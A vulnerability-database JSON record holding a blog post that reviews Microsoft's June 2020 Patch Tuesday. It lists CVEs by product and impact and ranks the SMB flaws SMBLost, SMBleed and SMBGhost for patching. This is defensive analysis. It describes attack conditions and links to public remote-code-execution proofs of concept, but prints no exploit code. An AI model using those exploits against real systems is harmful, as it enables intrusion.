\n[4561612](<http://support.microsoft.com/kb/4561612>) \n[4561674](<http://support.microsoft.com/kb/4561674>) \n[4561616](<http://support.microsoft.com/kb/4561616>) \n[4561608](<http://support.microsoft.com/kb/4561608>) \n[4561621](<http://support.microsoft.com/kb/4561621>) \n[4561673](<http://support.microsoft.com/kb/4561673>) \n[4562053](<http://support.microsoft.com/kb/4562053>) \n[4570333](<http://support.microsoft.com/kb/4570333>) \n[4574727](<http://support.microsoft.com/kb/4574727>)\n\n### *Microsoft official advisories*:", "edition": 2, "modified": "2020-09-10T00:00:00", "published": "2020-06-09T00:00:00", "id": "KLA11807", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11807", "title": "\r KLA11807Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2020-08-07T08:03:36", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0796", "CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1120", "CVE-2020-1148", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1163", "CVE-2020-1170", "CVE-2020-1177", "CVE-2020-1178", "CVE-2020-1181", "CVE-2020-1183", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1199", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1204", "CVE-2020-1206", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1209", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1217", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1221", "CVE-2020-1222", "CVE-2020-1223", "CVE-2020-1225", "CVE-2020-1226", "CVE-2020-1229", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1242", "CVE-2020-1244", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1248", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", 
"CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1265", "CVE-2020-1266", "CVE-2020-1268", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1277", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1284", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1289", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1295", "CVE-2020-1296", "CVE-2020-1297", "CVE-2020-1298", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1307", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1313", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1318", "CVE-2020-1320", "CVE-2020-1321", "CVE-2020-1322", "CVE-2020-1323", "CVE-2020-1324", "CVE-2020-1327", "CVE-2020-1328", "CVE-2020-1329", "CVE-2020-1331", "CVE-2020-1334", "CVE-2020-1340", "CVE-2020-1343", "CVE-2020-1348"], "description": "This time, Microsoft addressed 129 vulnerabilities: 11 critical and 118 important. In fact, in the file that I exported from the Microsoft website, I saw 2 more CVEs (CVE-2020-1221, CVE-2020-1328) related to Microsoft Dynamics 365 (on-premises). But there is no information on them on the Microsoft website, in the MITRE CVE database and NVD. Does this mean that these CVE ids were mentioned unintentionally and related to some critical issues? 
I don't think so, but this is strange.\n\n\n\nThis time there were no vulnerabilities with detected exploitation, so let's start with the group "Exploitation more likely" according to Microsoft.\n\n## Exploitation more likely (15)\n\n#### Remote Code Execution\n\n * Microsoft Browser ([CVE-2020-1219](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1219>))\n * VBScript ([CVE-2020-1214](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1214>), [CVE-2020-1215](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1215>), [CVE-2020-1230](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1230>), [CVE-2020-1213](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1213>), [CVE-2020-1216](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1216>), [CVE-2020-1260](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1260>))\n * Windows SMB ([CVE-2020-1301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301>))\n\n#### Denial of Service\n\n * Windows SMBv3 Client/Server ([CVE-2020-1284](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1284>))\n\n#### Elevation of Privilege\n\n * Windows Kernel ([CVE-2020-1207](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1207>), [CVE-2020-1247](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1247>), [CVE-2020-1251](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1251>), [CVE-2020-1253](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1253>))\n\n#### Security Feature Bypass\n\n * Windows Kernel ([CVE-2020-1241](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1241>))\n\n#### Information Disclosure\n\n * Windows SMBv3 Client/Server 
([CVE-2020-1206](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1206>))\n\nI think the SMB vulnerabilities should be addressed first.\n\n 1. Remote Code Execution in SMBv1 (CVE-2020-1301) protocol is called "SMBLost". The attacker should send a specially crafted packet to the target SMBv1 server. But unlike the famous EternalBlue, the attacker has to be authenticated and there should be a shared partition on the server (e.g. \u201cc:\\\u201d or \u201cd:\\\u201d), so it should be much less harmful. Anyway, if SMBv1 is not a mission critical component of your infrastructure, disable it!\n 2. Denial of Service in SMBv3 Client or Server (CVE-2020-1284). An authenticated attacker has to send a specially crafted packet to a vulnerable SMB server or host a maliciously configured SMBv3 server and convince the client to connect to it. The vulnerability exists in Windows 10 Version 2004 and Windows Server, version 2004 (Server Core installation).\n 3. The most interesting SMB vulnerability is Information Disclosure in SMBv3 Client/Server (CVE-2020-1206). It is called "SMBleed". And what makes it interesting is that the company that discovered this vulnerability, ZecOps, released a PoC that combines SMBleed exploitation with the exploitation of the March SMBGhost (CVE-2020-0796) vulnerability to gain unauthenticated RCE! ([write up](<https://blog.zecops.com/vulnerabilities/smbleedingghost-writeup-chaining-smbleed-cve-2020-1206-with-smbghost/>), [PoC](<https://github.com/ZecOps/CVE-2020-0796-RCE-POC>)) And it seems much more reliable than the code that was published earlier (for example, [PoC by chompie1337](<https://github.com/chompie1337/SMBGhost_RCE_PoC>)). This means that we are one step closer to real attacks that will exploit this vulnerability.\n\nOf course, you can say that SMBleed, SMBGhost and this new DoS vulnerability (CVE-2020-1284) affect only different versions of Windows 10 and Windows Server Core installations 1903, 1909, 2004. 
These Windows Server versions are pretty rare for corporate environments and vulnerable desktops are not such a big problem. Well, yes, but can you guarantee that you do not have virtual machines with Windows 10 that are used as servers? You can only guarantee this with a good IT inventory process!\n\nWhat about other "Exploitation more likely" vulnerabilities? Well, of course it's worth mentioning RCEs in Microsoft browsers (CVE-2020-1219): Internet Explorer 11 and Microsoft Edge. Also a lot of RCEs in VBScript (CVE-2020-1214, CVE-2020-1215, CVE-2020-1230, CVE-2020-1213, CVE-2020-1216, CVE-2020-1260). So, keep your web browser up-to-date and try not to click on suspicious links.\n\n## Other Product based (36)\n\n#### Microsoft SharePoint\n\n * Remote Code Execution ([CVE-2020-1181](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1181>))\n * Elevation of Privilege ([CVE-2020-1178](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1178>), [CVE-2020-1295](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1295>))\n * Cross Site Scripting ([CVE-2020-1177](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1177>), [CVE-2020-1183](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1183>), [CVE-2020-1297](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1297>), [CVE-2020-1298](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1298>), [CVE-2020-1318](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1318>), [CVE-2020-1320](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1320>))\n * Spoofing ([CVE-2020-1148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1148>), [CVE-2020-1289](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1289>))\n * Open Redirect 
([CVE-2020-1323](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1323>))\n\n#### Windows Kernel\n\n * Elevation of Privilege ([CVE-2020-0986](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0986>), [CVE-2020-1237](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1237>), [CVE-2020-1246](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1246>), [CVE-2020-1262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1262>), [CVE-2020-1264](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1264>), [CVE-2020-1266](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1266>), [CVE-2020-1269](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1269>), [CVE-2020-1273](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1273>), [CVE-2020-1274](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1274>), [CVE-2020-1275](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1275>), [CVE-2020-1276](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1276>), [CVE-2020-1307](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1307>), [CVE-2020-1310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1310>), [CVE-2020-1316](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1316>))\n * Information Disclosure ([CVE-2020-1290](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1290>))\n\n#### Windows Runtime\n\n * Elevation of Privilege ([CVE-2020-1231](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1231>), [CVE-2020-1233](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1233>), 
[CVE-2020-1235](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1235>), [CVE-2020-1265](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1265>), [CVE-2020-1282](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1282>), [CVE-2020-1304](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1304>), [CVE-2020-1306](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1306>), [CVE-2020-1334](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1334>))\n * Information Disclosure ([CVE-2020-1217](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1217>))\n\nAmong the products with the biggest number of vulnerabilities, we can once again highlight Microsoft SharePoint, and especially Remote Code Execution (CVE-2020-1181). "An authenticated attacker can execute code as the application\u2019s pool process". Other vulnerabilities are the Elevation of Privilege and Information Disclosure in Windows Kernel and Windows Runtime.\n\n## Other Vulnerability Type based (78)\n\n#### Remote Code Execution\n\n * Chakra Scripting Engine ([CVE-2020-1073](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1073>))\n * GDI+ ([CVE-2020-1248](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1248>))\n * Jet Database Engine ([CVE-2020-1208](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1208>), [CVE-2020-1236](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1236>))\n * LNK ([CVE-2020-1299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1299>))\n * Microsoft Excel ([CVE-2020-1225](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1225>), [CVE-2020-1226](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1226>))\n * Microsoft 
Office ([CVE-2020-1321](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1321>))\n * Windows ([CVE-2020-1300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1300>))\n * Windows OLE ([CVE-2020-1281](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1281>))\n * Windows Shell ([CVE-2020-1286](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1286>))\n * Word for Android ([CVE-2020-1223](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1223>))\n\n#### Denial of Service\n\n * Connected User Experiences and Telemetry Service ([CVE-2020-1120](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1120>), [CVE-2020-1244](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1244>))\n * Windows ([CVE-2020-1283](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1283>))\n * Windows Registry ([CVE-2020-1194](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1194>))\n\n#### Memory Corruption\n\n * Media Foundation ([CVE-2020-1238](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1238>), [CVE-2020-1239](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1239>))\n\n#### Elevation of Privilege\n\n * Component Object Model ([CVE-2020-1311](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1311>))\n * Connected Devices Platform Service ([CVE-2020-1211](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1211>))\n * Diagnostic Hub Standard Collector ([CVE-2020-1202](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1202>), [CVE-2020-1203](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1203>))\n * Diagnostics Hub Standard Collector 
([CVE-2020-1257](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1257>), [CVE-2020-1278](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1278>), [CVE-2020-1293](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1293>))\n * DirectX ([CVE-2020-1258](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1258>))\n * Group Policy ([CVE-2020-1317](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1317>))\n * Microsoft Store Runtime ([CVE-2020-1222](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1222>), [CVE-2020-1309](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1309>))\n * Microsoft Windows Defender ([CVE-2020-1163](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1163>), [CVE-2020-1170](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1170>))\n * OLE Automation ([CVE-2020-1212](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1212>))\n * OpenSSH for Windows ([CVE-2020-1292](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1292>))\n * Windows ([CVE-2020-1162](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1162>), [CVE-2020-1324](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1324>))\n * Windows Background Intelligent Transfer Service ([CVE-2020-1255](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1255>))\n * Windows Backup Service ([CVE-2020-1271](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1271>))\n * Windows Bluetooth Service ([CVE-2020-1280](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1280>))\n * Windows Error Reporting 
([CVE-2020-1234](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1234>))\n * Windows Error Reporting Manager ([CVE-2020-1197](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1197>))\n * Windows Feedback Hub ([CVE-2020-1199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1199>))\n * Windows GDI ([CVE-2020-0915](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0915>), [CVE-2020-0916](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0916>))\n * Windows Installer ([CVE-2020-1272](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1272>), [CVE-2020-1277](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1277>), [CVE-2020-1302](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1302>), [CVE-2020-1312](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1312>))\n * Windows Lockscreen ([CVE-2020-1279](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1279>))\n * Windows Mobile Device Management Diagnostics ([CVE-2020-1204](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1204>))\n * Windows Modules Installer Service ([CVE-2020-1254](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1254>))\n * Windows Network Connections Service ([CVE-2020-1291](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1291>))\n * Windows Network List Service ([CVE-2020-1209](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1209>))\n * Windows Now Playing Session Manager ([CVE-2020-1201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1201>))\n * Windows Print Configuration ([CVE-2020-1196](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1196>))\n * Windows State 
Repository Service ([CVE-2020-1305](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1305>))\n * Windows Text Service Framework ([CVE-2020-1314](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1314>))\n * Windows Update Orchestrator Service ([CVE-2020-1313](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1313>))\n * Windows WLAN Service ([CVE-2020-1270](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1270>))\n * Windows WalletService ([CVE-2020-1287](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1287>), [CVE-2020-1294](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1294>))\n\n#### Security Feature Bypass\n\n * Microsoft Outlook ([CVE-2020-1229](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1229>))\n * Windows Host Guardian Service ([CVE-2020-1259](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1259>))\n\n#### Information Disclosure\n\n * Internet Explorer ([CVE-2020-1315](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1315>))\n * Media Foundation ([CVE-2020-1232](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1232>))\n * Microsoft Edge ([CVE-2020-1242](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1242>))\n * Microsoft Graphics Component ([CVE-2020-1160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1160>))\n * Microsoft Project ([CVE-2020-1322](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1322>))\n * Visual Studio Code Live Share ([CVE-2020-1343](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1343>))\n * Windows Diagnostics & feedback ([CVE-2020-1296](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1296>))\n * Windows 
Error Reporting ([CVE-2020-1261](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1261>), [CVE-2020-1263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1263>))\n * Windows GDI ([CVE-2020-1348](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1348>))\n * Windows Service ([CVE-2020-1268](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1268>))\n\n#### Spoofing\n\n * Microsoft Bing Search ([CVE-2020-1329](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1329>))\n * Microsoft Edge (Chromium-based) in IE Mode ([CVE-2020-1220](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1220>))\n * NuGetGallery ([CVE-2020-1340](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1340>))\n * System Center Operations Manager ([CVE-2020-1331](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1331>))\n\n#### Code Injection\n\n * Azure DevOps Server ([CVE-2020-1327](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1327>))\n\nAmong other vulnerabilities, the most important are the various RCEs. \n\n * 2 RCE in Microsoft Excel (CVE-2020-1225, CVE-2020-1226). This might be interesting for phishing.\n * Yet another RCE in LNK file processing (CVE-2020-1299). This is the third this year.\n * RCE in Windows CAB files processing (CVE-2020-1300). Quote from zdi: the attackers "could also spoof a network printer and dupe a user into installing the specially crafted CAB file disguised as a printer driver. 
Users are often conditioned into trusting printer drivers when offered one, so it would not be surprising to see this get exploited".\n * VM vendors also pay attention to RCE in Chakra Scripting Engine (CVE-2020-1073), GDI+ (CVE-2020-1248), Jet Database Engine (CVE-2020-1208, CVE-2020-1236), Windows OLE (CVE-2020-1281) and Windows Shell (CVE-2020-1286).\n\nWhat else besides RCEs?\n\n * Nice Denial of Service in Windows Registry, but "an attacker would need access to the system in order to launch a crafted application to exploit this flaw."\n * A lot of Elevation of Privilege, but VM vendors highlight only vulnerabilities in OpenSSH for Windows (CVE-2020-1292) and Windows GDI (CVE-2020-0915, CVE-2020-0916).\n * Security Feature Bypass in Microsoft Outlook (CVE-2020-1229). It may "allow attackers to automatically load remote images \u2013 even from within the Preview Pane" and may be used with GDI+ RCE.\n * Among Information Disclosure vulnerabilities, ZDI highlights vulnerabilities in Microsoft Edge (CVE-2020-1242) and in Windows Diagnostics & feedback (CVE-2020-1296).\n\n## In conclusion\n\nIt's a rather interesting month, but the focus is still mainly on SMB RCE vulnerabilities and the possible use of these vulnerabilities in malware attacks.\n\n", "modified": "2020-06-23T01:31:46", "published": "2020-06-23T01:31:46", "id": "AVLEONOV:24538B1ED96269982136AA43998E5780", "href": "http://feedproxy.google.com/~r/avleonov/~3/wWMcz38Q7hQ/", "type": "avleonov", "title": "Microsoft Patch Tuesday June 2020: The Bleeding Ghost of SMB", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}